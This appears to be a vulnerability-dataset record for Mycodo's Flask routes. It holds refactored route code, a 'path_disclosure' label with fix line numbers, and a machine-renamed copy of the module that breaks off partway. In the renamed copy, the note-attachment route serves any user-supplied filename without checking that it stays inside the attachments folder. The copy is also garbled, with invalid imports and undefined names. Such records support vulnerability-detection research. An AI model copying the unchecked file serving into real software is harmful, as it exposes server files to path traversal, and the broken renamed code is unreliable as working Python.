                pixels.append(raw_data['series'][0]['values'][0][1])

    # logger.error("generate_thermal_image_from_timestamp: success: {}, pixels: {}".format(success, pixels))

    if success:
        generate_thermal_image_from_pixels(pixels, 8, 8, path_file)
        return send_file(path_file, mimetype='image/jpeg')
    else:
        return "Could not generate image"
@blueprint.route('/export_data/<unique_id>/<measurement_id>/<start_seconds>/<end_seconds>')
@flask_login.login_required
def export_data(unique_id, measurement_id, start_seconds, end_seconds):
    """
    Return data from start_seconds to end_seconds from influxdb.
    Used for exporting data.

    Streams the result as a CSV attachment; redirects back to the export
    page (with a flashed error) when the query is invalid or empty.
    """
    dbcon = InfluxDBClient(
        INFLUXDB_HOST,
        INFLUXDB_PORT,
        INFLUXDB_USER,
        INFLUXDB_PASSWORD,
        INFLUXDB_DATABASE, timeout=100)

    # The unique ID may belong to an Output, Input, or Math controller
    output = Output.query.filter(Output.unique_id == unique_id).first()
    input_dev = Input.query.filter(Input.unique_id == unique_id).first()
    math = Math.query.filter(Math.unique_id == unique_id).first()

    if output:
        name = output.name
    elif input_dev:
        name = input_dev.name
    elif math:
        name = math.name
    else:
        name = None

    device_measurement = DeviceMeasurements.query.filter(
        DeviceMeasurements.unique_id == measurement_id).first()
    if device_measurement:
        conversion = Conversion.query.filter(
            Conversion.unique_id == device_measurement.conversion_id).first()
    else:
        conversion = None
    channel, unit, measurement = return_measurement_info(
        device_measurement, conversion)

    # Shift local epoch inputs to UTC for the influxdb query window
    utc_offset_timedelta = datetime.datetime.utcnow() - datetime.datetime.now()
    start = datetime.datetime.fromtimestamp(float(start_seconds))
    start += utc_offset_timedelta
    start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
    end = datetime.datetime.fromtimestamp(float(end_seconds))
    end += utc_offset_timedelta
    end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')

    query_str = query_string(
        unit, unique_id,
        measure=measurement, channel=channel,
        start_str=start_str, end_str=end_str)
    if query_str == 1:
        flash('Invalid query string', 'error')
        return redirect(url_for('routes_page.page_export'))
    raw_data = dbcon.query(query_str).raw

    if not raw_data or 'series' not in raw_data or not raw_data['series']:
        flash('No measurements to export in this time period', 'error')
        return redirect(url_for('routes_page.page_export'))

    # Generate column names
    col_1 = 'timestamp (UTC)'
    col_2 = '{name} {meas} ({id})'.format(
        name=name, meas=measurement, id=unique_id)
    csv_filename = '{id}_{name}_{meas}.csv'.format(
        id=unique_id, name=name, meas=measurement)

    import csv
    from io import StringIO

    def iter_csv(data):
        """ Stream CSV file to user for download """
        # Re-use a single StringIO buffer: write a row, yield it, truncate
        line = StringIO()
        writer = csv.writer(line)
        writer.writerow([col_1, col_2])
        for csv_line in data:
            writer.writerow([
                str(csv_line[0][:-4]).replace('T', ' '),
                csv_line[1]
            ])
            line.seek(0)
            yield line.read()
            line.truncate(0)
            line.seek(0)

    response = Response(iter_csv(raw_data['series'][0]['values']), mimetype='text/csv')
    response.headers['Content-Disposition'] = 'attachment; filename="{}"'.format(csv_filename)
    return response
@blueprint.route('/async/<device_id>/<device_type>/<measurement_id>/<start_seconds>/<end_seconds>')
@flask_login.login_required
def async_data(device_id, device_type, measurement_id, start_seconds, end_seconds):
    """
    Return data from start_seconds to end_seconds from influxdb.
    Used for asynchronous graph display of many points (up to millions).

    When more than 700 points fall in the window, they are averaged into
    ~700 groups to bound the response size. start/end of '0' mean
    "unbounded" on that side.
    """
    if device_type == 'tag':
        # Tags come from the Notes table, not influxdb
        notes_list = []
        tag = NoteTags.query.filter(NoteTags.unique_id == device_id).first()

        start = datetime.datetime.utcfromtimestamp(float(start_seconds))
        if end_seconds == '0':
            end = datetime.datetime.utcnow()
        else:
            end = datetime.datetime.utcfromtimestamp(float(end_seconds))

        notes = Notes.query.filter(
            and_(Notes.date_time >= start, Notes.date_time <= end)).all()
        for each_note in notes:
            if tag.unique_id in each_note.tags.split(','):
                notes_list.append(
                    [each_note.date_time.strftime("%Y-%m-%dT%H:%M:%S.000000000Z"), each_note.name, each_note.note])

        if notes_list:
            return jsonify(notes_list)
        else:
            return '', 204

    dbcon = InfluxDBClient(
        INFLUXDB_HOST,
        INFLUXDB_PORT,
        INFLUXDB_USER,
        INFLUXDB_PASSWORD,
        INFLUXDB_DATABASE)

    if device_type in ['input', 'math', 'function', 'output', 'pid']:
        measure = DeviceMeasurements.query.filter(
            DeviceMeasurements.unique_id == measurement_id).first()
    else:
        measure = None

    if not measure:
        return "Could not find measurement"

    if measure:
        conversion = Conversion.query.filter(
            Conversion.unique_id == measure.conversion_id).first()
    else:
        conversion = None
    channel, unit, measurement = return_measurement_info(
        measure, conversion)

    # Set the time frame to the past year if start/end not specified
    if start_seconds == '0' and end_seconds == '0':
        # Get how many points there are in the past year
        query_str = query_string(
            unit, device_id,
            measure=measurement,
            channel=channel,
            value='COUNT')
        if query_str == 1:
            return '', 204
        raw_data = dbcon.query(query_str).raw

        count_points = raw_data['series'][0]['values'][0][1]
        # Get the timestamp of the first point in the past year
        query_str = query_string(
            unit, device_id,
            measure=measurement,
            channel=channel,
            limit=1)
        if query_str == 1:
            return '', 204
        raw_data = dbcon.query(query_str).raw

        try:
            first_point = raw_data['series'][0]['values'][0][0]
        except:
            return '', 204

        end = datetime.datetime.utcnow()
        end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
    # Set the time frame to the past start epoch to now
    elif start_seconds != '0' and end_seconds == '0':
        start = datetime.datetime.utcfromtimestamp(float(start_seconds))
        start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
        end = datetime.datetime.utcnow()
        end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')

        query_str = query_string(
            unit, device_id,
            measure=measurement,
            channel=channel,
            value='COUNT',
            start_str=start_str,
            end_str=end_str)
        if query_str == 1:
            return '', 204
        raw_data = dbcon.query(query_str).raw

        try:
            count_points = raw_data['series'][0]['values'][0][1]
        except:
            return '', 204

        # Get the timestamp of the first point in the past year
        query_str = query_string(
            unit, device_id,
            measure=measurement,
            channel=channel,
            start_str=start_str,
            end_str=end_str,
            limit=1)
        if query_str == 1:
            return '', 204
        raw_data = dbcon.query(query_str).raw

        try:
            first_point = raw_data['series'][0]['values'][0][0]
        except:
            return '', 204
    else:
        # Explicit start and end epochs supplied
        start = datetime.datetime.utcfromtimestamp(float(start_seconds))
        start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
        end = datetime.datetime.utcfromtimestamp(float(end_seconds))
        end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')

        query_str = query_string(
            unit, device_id,
            measure=measurement,
            channel=channel,
            value='COUNT',
            start_str=start_str,
            end_str=end_str)
        if query_str == 1:
            return '', 204
        raw_data = dbcon.query(query_str).raw

        try:
            count_points = raw_data['series'][0]['values'][0][1]
        except:
            return '', 204

        # Get the timestamp of the first point in the past year
        query_str = query_string(
            unit, device_id,
            measure=measurement,
            channel=channel,
            start_str=start_str,
            end_str=end_str,
            limit=1)
        if query_str == 1:
            return '', 204
        raw_data = dbcon.query(query_str).raw

        try:
            first_point = raw_data['series'][0]['values'][0][0]
        except:
            return '', 204

    # Re-anchor the window start at the first actual data point
    start = datetime.datetime.strptime(
        influx_time_str_to_milliseconds(first_point),
        '%Y-%m-%dT%H:%M:%S.%f')
    start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')

    logger.debug('Count = {}'.format(count_points))
    logger.debug('Start = {}'.format(start))
    logger.debug('End = {}'.format(end))

    # How many seconds between the start and end period
    time_difference_seconds = (end - start).total_seconds()
    logger.debug('Difference seconds = {}'.format(time_difference_seconds))

    # If there are more than 700 points in the time frame, we need to group
    # data points into 700 groups with points averaged in each group.
    if count_points > 700:
        # Average period between input reads
        seconds_per_point = time_difference_seconds / count_points
        logger.debug('Seconds per point = {}'.format(seconds_per_point))

        # How many seconds to group data points in
        group_seconds = int(time_difference_seconds / 700)
        logger.debug('Group seconds = {}'.format(group_seconds))

        try:
            query_str = query_string(
                unit, device_id,
                measure=measurement,
                channel=channel,
                value='MEAN',
                start_str=start_str,
                end_str=end_str,
                group_sec=group_seconds)
            if query_str == 1:
                return '', 204
            raw_data = dbcon.query(query_str).raw

            try:
                return jsonify(raw_data['series'][0]['values'])
            except:
                return '', 204
        except Exception as e:
            logger.error("URL for 'async_data' raised and error: "
                         "{err}".format(err=e))
            return '', 204
    else:
        try:
            query_str = query_string(
                unit, device_id,
                measure=measurement,
                channel=channel,
                start_str=start_str,
                end_str=end_str)
            if query_str == 1:
                return '', 204
            raw_data = dbcon.query(query_str).raw
            return jsonify(raw_data['series'][0]['values'])
        except Exception as e:
            logger.error("URL for 'async_data' raised and error: "
                         "{err}".format(err=e))
            return '', 204
@blueprint.route('/async_usage/<device_id>/<unit>/<channel>/<start_seconds>/<end_seconds>')
@flask_login.login_required
def async_usage_data(device_id, unit, channel, start_seconds, end_seconds):
    """
    Return data from start_seconds to end_seconds from influxdb.
    Used for asynchronous energy usage display of many points (up to millions).

    start_seconds/end_seconds are epoch-second strings; '0' means that bound
    is unspecified (both '0' queries the measurement's default time frame).
    Responds with 204 (no content) on any query failure instead of raising.
    """
    dbcon = InfluxDBClient(
        INFLUXDB_HOST,
        INFLUXDB_PORT,
        INFLUXDB_USER,
        INFLUXDB_PASSWORD,
        INFLUXDB_DATABASE)

    def _count_and_first_point(**time_range):
        """Return (point count, first point timestamp) for the given range,
        or None if a query could not be built or returned no data.

        The original inlined this twice per branch; failures in the count
        query previously raised uncaught KeyError/IndexError (HTTP 500) —
        now treated the same as the other failure paths (caller returns 204).
        """
        query_str = query_string(
            unit, device_id,
            channel=channel,
            value='COUNT',
            **time_range)
        if query_str == 1:
            return None
        raw_count = dbcon.query(query_str).raw
        try:
            count_points = raw_count['series'][0]['values'][0][1]
        except (KeyError, IndexError):
            return None
        query_str = query_string(
            unit, device_id,
            channel=channel,
            limit=1,
            **time_range)
        if query_str == 1:
            return None
        raw_first = dbcon.query(query_str).raw
        try:
            first_point = raw_first['series'][0]['values'][0][0]
        except (KeyError, IndexError):
            return None
        return count_points, first_point

    if start_seconds == '0' and end_seconds == '0':
        # No bounds given: query over the measurement's default time frame
        found = _count_and_first_point()
        end = datetime.datetime.utcnow()
        end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
    elif start_seconds != '0' and end_seconds == '0':
        # From the given start epoch to now
        start = datetime.datetime.utcfromtimestamp(float(start_seconds))
        start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
        end = datetime.datetime.utcnow()
        end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
        found = _count_and_first_point(start_str=start_str, end_str=end_str)
    else:
        # Explicit start and end epochs
        start = datetime.datetime.utcfromtimestamp(float(start_seconds))
        start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
        end = datetime.datetime.utcfromtimestamp(float(end_seconds))
        end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
        found = _count_and_first_point(start_str=start_str, end_str=end_str)

    if found is None:
        return '', 204
    count_points, first_point = found

    # Snap the start of the window to the first recorded point
    start = datetime.datetime.strptime(
        influx_time_str_to_milliseconds(first_point),
        '%Y-%m-%dT%H:%M:%S.%f')
    start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
    logger.debug('Count = {}'.format(count_points))
    logger.debug('Start = {}'.format(start))
    logger.debug('End = {}'.format(end))

    # How many seconds between the start and end period
    time_difference_seconds = (end - start).total_seconds()
    logger.debug('Difference seconds = {}'.format(time_difference_seconds))

    # If there are more than 700 points in the time frame, we need to group
    # data points into 700 groups with points averaged in each group.
    if count_points > 700:
        # Average period between input reads
        seconds_per_point = time_difference_seconds / count_points
        logger.debug('Seconds per point = {}'.format(seconds_per_point))
        # How many seconds to group data points in
        group_seconds = int(time_difference_seconds / 700)
        logger.debug('Group seconds = {}'.format(group_seconds))
        try:
            query_str = query_string(
                unit, device_id,
                channel=channel,
                value='MEAN',
                start_str=start_str,
                end_str=end_str,
                group_sec=group_seconds)
            if query_str == 1:
                return '', 204
            raw_data = dbcon.query(query_str).raw
            return jsonify(raw_data['series'][0]['values'])
        except Exception as e:
            # Fixed: this log line previously said 'async_data', which made
            # failures here indistinguishable from the async_data endpoint.
            logger.error("URL for 'async_usage' raised and error: "
                         "{err}".format(err=e))
            return '', 204
    else:
        try:
            query_str = query_string(
                unit, device_id,
                channel=channel,
                start_str=start_str,
                end_str=end_str)
            if query_str == 1:
                return '', 204
            raw_data = dbcon.query(query_str).raw
            return jsonify(raw_data['series'][0]['values'])
        except Exception as e:
            logger.error("URL for 'async_usage' raised and error: "
                         "{err}".format(err=e))
            return '', 204
@blueprint.route('/output_mod/<output_id>/<channel>/<state>/<output_type>/<amount>')
@flask_login.login_required
def output_mod(output_id, channel, state, output_type, amount):
    """ Manipulate output (using non-unique ID) """
    if not utils_general.user_has_permission('edit_controllers'):
        return 'Insufficient user permissions to manipulate outputs'

    # Resolve the output channel number: either a plain integer or the
    # unique ID of an OutputChannel row.
    if is_int(channel):
        output_channel = int(channel)
    else:
        channel_dev = db_retrieve_table(OutputChannel).filter(
            OutputChannel.unique_id == channel).first()
        if not channel_dev:
            return "Could not determine channel number from channel ID '{}'".format(channel)
        output_channel = channel_dev.channel

    daemon = DaemonControl()

    # str_is_float must be checked before float(amount) is evaluated
    valid_request = (
        state in ['on', 'off'] and
        str_is_float(amount) and
        (
            (output_type in ['sec', 'pwm'] and float(amount) >= 0) or
            output_type == 'vol' or
            output_type == 'value'
        ))
    if not valid_request:
        return 'ERROR: unknown parameters: ' \
               'output_id: {}, channel: {}, state: {}, output_type: {}, amount: {}'.format(
                   output_id, channel, state, output_type, amount)

    out_status = daemon.output_on_off(
        output_id,
        state,
        output_type=output_type,
        amount=float(amount),
        output_channel=output_channel)
    if out_status[0]:
        return 'ERROR: {}'.format(out_status[1])
    return 'SUCCESS: {}'.format(out_status[1])
@blueprint.route('/daemonactive')
@flask_login.login_required
def daemon_active():
    """Return 'alive' if the daemon is running"""
    try:
        # Ask the daemon directly; any failure to reach it reports '0'
        return DaemonControl().daemon_status()
    except Exception as e:
        logger.error("URL for 'daemon_active' raised and error: "
                     "{err}".format(err=e))
        return '0'
@blueprint.route('/systemctl/<action>')
@flask_login.login_required
def computer_command(action):
    """Execute one of several commands as root"""
    # Only users with edit_settings permission may issue system commands
    if not utils_general.user_has_permission('edit_settings'):
        return redirect(url_for('routes_general.home'))
    try:
        # Whitelist check happens before any shell command is built, so an
        # arbitrary `action` string can never reach subprocess below.
        if action not in ['restart', 'shutdown', 'daemon_restart', 'frontend_reload']:
            # NOTE(review): flashed with category "success" even though this
            # is a rejection — confirm whether "error" was intended.
            flash("Unrecognized command: {action}".format(
                action=action), "success")
            return redirect('/settings')
        if DOCKER_CONTAINER:
            # Inside Docker there is no wrapper script: restart the daemon by
            # terminating it, and reload the frontend by restarting its
            # container. 'restart'/'shutdown' are silently ignored here.
            if action == 'daemon_restart':
                control = DaemonControl()
                control.terminate_daemon()
                flash(gettext("Command to restart the daemon sent"), "success")
            elif action == 'frontend_reload':
                subprocess.Popen('docker restart mycodo_flask 2>&1', shell=True)
                flash(gettext("Command to reload the frontend sent"), "success")
        else:
            # Host install: delegate the whitelisted action to mycodo_wrapper
            # (runs asynchronously; the flash messages below describe the
            # expected effect, not a confirmed result).
            cmd = '{path}/mycodo/scripts/mycodo_wrapper {action} 2>&1'.format(
                path=INSTALL_DIRECTORY, action=action)
            subprocess.Popen(cmd, shell=True)
            if action == 'restart':
                flash(gettext("System rebooting in 10 seconds"), "success")
            elif action == 'shutdown':
                flash(gettext("System shutting down in 10 seconds"), "success")
            elif action == 'daemon_restart':
                flash(gettext("Command to restart the daemon sent"), "success")
            elif action == 'frontend_reload':
                flash(gettext("Command to reload the frontend sent"), "success")
        return redirect('/settings')
    except Exception as e:
        logger.error("System command '{cmd}' raised and error: "
                     "{err}".format(cmd=action, err=e))
        flash("System command '{cmd}' raised and error: "
              "{err}".format(cmd=action, err=e), "error")
        return redirect(url_for('routes_general.home'))
#
# PID Dashboard object routes
#
def return_point_timestamp(dev_id, unit, period, measurement=None, channel=None):
    """Return [epoch_ms, value] of the last point within the past `period`
    seconds from influxdb, or [None, None] if unavailable."""
    dbcon = InfluxDBClient(
        INFLUXDB_HOST,
        INFLUXDB_PORT,
        INFLUXDB_USER,
        INFLUXDB_PASSWORD,
        INFLUXDB_DATABASE)
    query_str = query_string(
        unit,
        dev_id,
        measure=measurement,
        channel=channel,
        value='LAST',
        past_sec=period)
    if query_str == 1:
        return [None, None]
    try:
        values = dbcon.query(query_str).raw['series'][0]['values']
        time_raw = values[-1][0]
        value = '{:.3f}'.format(float(values[-1][1]))
        # Convert date-time to epoch (potential bottleneck for data)
        dt = date_parse(time_raw)
        timestamp = calendar.timegm(dt.timetuple()) * 1000
        return [timestamp, value]
    except Exception:
        # Missing series, empty values, or parse failure: no data available
        return [None, None]
@blueprint.route('/last_pid/<pid_id>/<input_period>')
@flask_login.login_required
def last_data_pid(pid_id, input_period):
    """Return the most recent time and value from influxdb"""
    # input_period is the look-back window in seconds; reject non-numeric
    if not str_is_float(input_period):
        return '', 204
    try:
        pid = PID.query.filter(PID.unique_id == pid_id).first()
        # pid.measurement is stored as "<device_id>,<measurement_id>"
        if len(pid.measurement.split(',')) == 2:
            device_id = pid.measurement.split(',')[0]
            measurement_id = pid.measurement.split(',')[1]
        else:
            device_id = None
            measurement_id = None
        actual_measurement = DeviceMeasurements.query.filter(
            DeviceMeasurements.unique_id == measurement_id).first()
        if actual_measurement:
            actual_conversion = Conversion.query.filter(
                Conversion.unique_id == actual_measurement.conversion_id).first()
        else:
            actual_conversion = None
        # Resolve the channel/unit/measurement actually stored, after any
        # configured unit conversion is applied
        (actual_channel,
         actual_unit,
         actual_measurement) = return_measurement_info(
            actual_measurement, actual_conversion)
        # Determine the unit the setpoint is expressed in (the measurement
        # the PID regulates)
        setpoint_unit = None
        if pid and ',' in pid.measurement:
            pid_measurement = pid.measurement.split(',')[1]
            setpoint_measurement = DeviceMeasurements.query.filter(
                DeviceMeasurements.unique_id == pid_measurement).first()
            if setpoint_measurement:
                conversion = Conversion.query.filter(
                    Conversion.unique_id == setpoint_measurement.conversion_id).first()
                _, setpoint_unit, _ = return_measurement_info(setpoint_measurement, conversion)
        # Latest P, I, and D term contributions, each as [timestamp, value]
        p_value = return_point_timestamp(
            pid_id, 'pid_value', input_period, measurement='pid_p_value')
        i_value = return_point_timestamp(
            pid_id, 'pid_value', input_period, measurement='pid_i_value')
        d_value = return_point_timestamp(
            pid_id, 'pid_value', input_period, measurement='pid_d_value')
        # Combined PID output is only meaningful if all three terms exist
        if None not in (p_value[1], i_value[1], d_value[1]):
            pid_value = [p_value[0], '{:.3f}'.format(float(p_value[1]) + float(i_value[1]) + float(d_value[1]))]
        else:
            pid_value = None
        # Ask the live daemon for the current setpoint band, if configured;
        # best-effort: a failure just leaves it as None
        setpoint_band = None
        if pid.band:
            try:
                daemon = DaemonControl()
                setpoint_band = daemon.pid_get(pid.unique_id, 'setpoint_band')
            except:
                logger.debug("Couldn't get setpoint")
        live_data = {
            'activated': pid.is_activated,
            'paused': pid.is_paused,
            'held': pid.is_held,
            'setpoint': return_point_timestamp(
                pid_id, setpoint_unit, input_period, channel=0),
            'setpoint_band': setpoint_band,
            'pid_p_value': p_value,
            'pid_i_value': i_value,
            'pid_d_value': d_value,
            'pid_pid_value': pid_value,
            'duration_time': return_point_timestamp(
                pid_id, 's', input_period, measurement='duration_time'),
            'duty_cycle': return_point_timestamp(
                pid_id, 'percent', input_period, measurement='duty_cycle'),
            'actual': return_point_timestamp(
                device_id,
                actual_unit,
                input_period,
                measurement=actual_measurement,
                channel=actual_channel)
        }
        return jsonify(live_data)
    except KeyError:
        logger.debug("No Data returned form influxdb")
        return '', 204
    except Exception as e:
        logger.exception("URL for 'last_pid' raised and error: "
                         "{err}".format(err=e))
        return '', 204
@blueprint.route('/pid_mod_unique_id/<unique_id>/<state>')
@flask_login.login_required
def pid_mod_unique_id(unique_id, state):
    """ Manipulate output (using unique ID) """
    if not utils_general.user_has_permission('edit_controllers'):
        return 'Insufficient user permissions to manipulate PID'

    pid = PID.query.filter(PID.unique_id == unique_id).first()
    daemon = DaemonControl()

    # Each branch persists the DB flags first, then notifies the daemon.
    # An unrecognized state falls through and returns None.
    if state == 'activate_pid':
        pid.is_activated = True
        pid.save()
        _, msg = daemon.controller_activate(pid.unique_id)
        return msg
    if state == 'deactivate_pid':
        pid.is_activated = False
        pid.is_paused = False
        pid.is_held = False
        pid.save()
        _, msg = daemon.controller_deactivate(pid.unique_id)
        return msg
    if state == 'pause_pid':
        pid.is_paused = True
        pid.save()
        if pid.is_activated:
            return daemon.pid_pause(pid.unique_id)
        return "PID Paused (Note: PID is not currently active)"
    if state == 'hold_pid':
        pid.is_held = True
        pid.save()
        if pid.is_activated:
            return daemon.pid_hold(pid.unique_id)
        return "PID Held (Note: PID is not currently active)"
    if state == 'resume_pid':
        pid.is_held = False
        pid.is_paused = False
        pid.save()
        if pid.is_activated:
            return daemon.pid_resume(pid.unique_id)
        return "PID Resumed (Note: PID is not currently active)"
    if 'set_setpoint_pid' in state:
        # state has the form "set_setpoint_pid|<value>"
        new_setpoint = state.split('|')[1]
        pid.setpoint = new_setpoint
        pid.save()
        if pid.is_activated:
            return daemon.pid_set(pid.unique_id, 'setpoint', float(new_setpoint))
        return "PID Setpoint changed (Note: PID is not currently active)"
# import flask_login
# from mycodo.mycodo_flask.api import api
# @blueprint.route('/export_swagger')
# @flask_login.login_required
# def export_swagger():
# """Export swagger JSON to swagger.json file"""
# from mycodo.mycodo_flask.utils import utils_general
# import json
# if not utils_general.user_has_permission('view_settings'):
# return 'You do not have permission to access this.', 401
# with open("/home/pi/swagger.json", "w") as text_file:
# text_file.write(json.dumps(api.__schema__, indent=2))
# return 'success'
| path_disclosure | {
"code": [
" return send_file(file_path, as_attachment=True)",
" return send_file(path_file, mimetype='image/jpeg')"
],
"line_no": [
120,
152
]
} | {
"code": [
" if os.path.abspath(file_path).startswith(PATH_NOTE_ATTACHMENTS):",
" return send_file(file_path, as_attachment=True)",
" return send_file(path_file, mimetype='image/jpeg')"
],
"line_no": [
120,
121,
154
]
} |
import calendar
import datetime
import logging
import subprocess
import time
from importlib import import_module
import flask_login
import os
from dateutil.parser import parse as date_parse
from flask import Response
from flask import flash
from flask import jsonify
from flask import redirect
from flask import send_file
from flask import send_from_directory
from flask import url_for
from flask.blueprints import Blueprint
from flask_babel import gettext
from flask_limiter import Limiter
from influxdb import InfluxDBClient
from sqlalchemy import and_
from mycodo.config import DOCKER_CONTAINER
from mycodo.config import INFLUXDB_DATABASE
from mycodo.config import INFLUXDB_HOST
from mycodo.config import INFLUXDB_PASSWORD
from mycodo.config import INFLUXDB_PORT
from mycodo.config import INFLUXDB_USER
from mycodo.config import INSTALL_DIRECTORY
from mycodo.config import LOG_PATH
from mycodo.config import PATH_CAMERAS
from mycodo.config import PATH_NOTE_ATTACHMENTS
from mycodo.databases.models import Camera
from mycodo.databases.models import Conversion
from mycodo.databases.models import DeviceMeasurements
from mycodo.databases.models import Input
from mycodo.databases.models import Math
from mycodo.databases.models import NoteTags
from mycodo.databases.models import Notes
from mycodo.databases.models import Output
from mycodo.databases.models import OutputChannel
from mycodo.databases.models import PID
from mycodo.devices.camera import .camera_record
from mycodo.mycodo_client import DaemonControl
from mycodo.mycodo_flask.routes_authentication import clear_cookie_auth
from mycodo.mycodo_flask.utils import utils_general
from mycodo.mycodo_flask.utils.utils_general import get_ip_address
from mycodo.mycodo_flask.utils.utils_output import get_all_output_states
from mycodo.utils.database import db_retrieve_table
from mycodo.utils.image import .generate_thermal_image_from_pixels
from mycodo.utils.influx import influx_time_str_to_milliseconds
from mycodo.utils.influx import .query_string
from mycodo.utils.system_pi import assure_path_exists
from mycodo.utils.system_pi import is_int
from mycodo.utils.system_pi import return_measurement_info
from mycodo.utils.system_pi import str_is_float
VAR_0 = Blueprint('routes_general',
__name__,
static_folder='../static',
template_folder='../templates')
VAR_1 = logging.getLogger(__name__)
VAR_2 = Limiter(key_func=get_ip_address)
@VAR_0.route('/')
def FUNC_0():
try:
if flask_login.current_user.is_authenticated:
if flask_login.current_user.landing_page == 'live':
return redirect(url_for('routes_page.page_live'))
elif flask_login.current_user.landing_page == 'dashboard':
return redirect(url_for('routes_dashboard.page_dashboard_default'))
elif flask_login.current_user.landing_page == 'info':
return redirect(url_for('routes_page.page_info'))
return redirect(url_for('routes_page.page_live'))
except:
VAR_1.error("User may not be logged in. Clearing cookie auth.")
return clear_cookie_auth()
@VAR_0.route('/index_page')
def FUNC_1():
try:
if not flask_login.current_user.index_page:
return FUNC_0()
elif flask_login.current_user.index_page == 'landing':
return FUNC_0()
else:
if flask_login.current_user.is_authenticated:
if flask_login.current_user.index_page == 'live':
return redirect(url_for('routes_page.page_live'))
elif flask_login.current_user.index_page == 'dashboard':
return redirect(url_for('routes_dashboard.page_dashboard_default'))
elif flask_login.current_user.index_page == 'info':
return redirect(url_for('routes_page.page_info'))
return redirect(url_for('routes_page.page_live'))
except:
VAR_1.error("User may not be logged in. Clearing cookie auth.")
return clear_cookie_auth()
@VAR_0.route('/settings', methods=('GET', 'POST'))
@flask_login.login_required
def FUNC_2():
return redirect('settings/general')
@VAR_0.route('/note_attachment/<VAR_3>')
@flask_login.login_required
def FUNC_3(VAR_3):
VAR_32 = os.path.join(PATH_NOTE_ATTACHMENTS, VAR_3)
if VAR_32 is not None:
try:
return send_file(VAR_32, as_attachment=True)
except Exception:
VAR_1.exception("Send note attachment")
@VAR_0.route('/VAR_8/<VAR_4>/<VAR_5>/<VAR_3>')
@flask_login.login_required
def FUNC_4(VAR_4, VAR_5, VAR_3):
VAR_8 = Camera.query.filter(Camera.unique_id == VAR_4).first()
VAR_33 = assure_path_exists(
os.path.join(PATH_CAMERAS, '{uid}'.format(uid=VAR_8.unique_id)))
if VAR_5 == 'still':
if VAR_8.path_still:
VAR_34 = VAR_8.path_still
else:
VAR_34 = os.path.join(VAR_33, VAR_5)
elif VAR_5 == 'timelapse':
if VAR_8.path_timelapse:
VAR_34 = VAR_8.path_timelapse
else:
VAR_34 = os.path.join(VAR_33, VAR_5)
else:
return "Unknown Image Type"
if os.path.isdir(VAR_34):
VAR_71 = (files for VAR_71 in os.listdir(VAR_34)
if os.path.isfile(os.path.join(VAR_34, VAR_71)))
else:
VAR_71 = []
if VAR_3 in VAR_71:
VAR_46 = os.path.join(VAR_34, VAR_3)
return send_file(VAR_46, mimetype='image/jpeg')
return "Image not found"
@VAR_0.route('/camera_acquire_image/<VAR_6>/<VAR_4>/<VAR_7>')
@flask_login.login_required
def FUNC_5(VAR_6, VAR_4, VAR_7):
if VAR_6 == 'new':
VAR_72 = None
elif VAR_6 == 'tmp':
VAR_72 = '{id}_tmp.jpg'.format(id=VAR_4)
else:
return
VAR_34, VAR_3 = camera_record('photo', VAR_4, VAR_72=tmp_filename)
VAR_35 = os.path.join(VAR_34, VAR_3)
VAR_36 = datetime.datetime.now() - datetime.timedelta(seconds=int(VAR_7))
VAR_16 = os.path.getctime(VAR_35)
if datetime.datetime.fromtimestamp(VAR_16) > VAR_36:
VAR_73 = datetime.datetime.fromtimestamp(VAR_16).strftime('%Y-%m-%d %H:%M:%S')
VAR_74 = '["{}","{}"]'.format(VAR_3, VAR_73)
else:
VAR_74 = '["max_age_exceeded"]'
return Response(VAR_74, mimetype='text/json')
@VAR_0.route('/camera_latest_timelapse/<VAR_4>/<VAR_7>')
@flask_login.login_required
def FUNC_6(VAR_4, VAR_7):
VAR_8 = Camera.query.filter(
Camera.unique_id == VAR_4).first()
VAR_37, VAR_38 = utils_general.get_camera_paths(VAR_8)
VAR_39 = os.path.join(VAR_38, str(VAR_8.timelapse_last_file))
if VAR_8.timelapse_last_file is not None and os.path.exists(VAR_39):
VAR_36 = datetime.datetime.now() - datetime.timedelta(seconds=int(VAR_7))
if datetime.datetime.fromtimestamp(VAR_8.timelapse_last_ts) > VAR_36:
VAR_106 = datetime.datetime.fromtimestamp(VAR_8.timelapse_last_ts).strftime("%Y-%m-%d %H:%M:%S")
VAR_74 = '["{}","{}"]'.format(VAR_8.timelapse_last_file, VAR_106)
else:
VAR_74 = '["max_age_exceeded"]'
else:
VAR_74 = '["file_not_found"]'
return Response(VAR_74, mimetype='text/json')
def FUNC_7(VAR_8):
while True:
VAR_75 = VAR_8.get_frame()
yield (b'--VAR_75\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + VAR_75 + b'\r\n')
@VAR_0.route('/FUNC_8/<VAR_9>')
@flask_login.login_required
def FUNC_8(VAR_9):
VAR_40 = Camera.query.filter(Camera.unique_id == VAR_9).first()
VAR_41 = import_module('mycodo.mycodo_flask.camera.camera_' + VAR_40.library).Camera
VAR_41.set_camera_options(VAR_40)
return Response(FUNC_7(VAR_41(VAR_9=unique_id)),
mimetype='multipart/x-mixed-replace; boundary=frame')
@VAR_0.route('/outputstate')
@flask_login.login_required
def FUNC_9():
return jsonify(get_all_output_states())
@VAR_0.route('/outputstate_unique_id/<VAR_9>/<VAR_10>')
@flask_login.login_required
def FUNC_10(VAR_9, VAR_10):
VAR_22 = OutputChannel.query.filter(OutputChannel.unique_id == VAR_10).first()
VAR_42 = DaemonControl()
VAR_24 = VAR_42.output_state(VAR_9, VAR_22.channel)
return jsonify(VAR_24)
@VAR_0.route('/FUNC_11/<VAR_9>')
@flask_login.login_required
def FUNC_11(VAR_9):
VAR_42 = DaemonControl()
VAR_43 = VAR_42.widget_execute(VAR_9)
return jsonify(VAR_43)
@VAR_0.route('/time')
@flask_login.login_required
def FUNC_12():
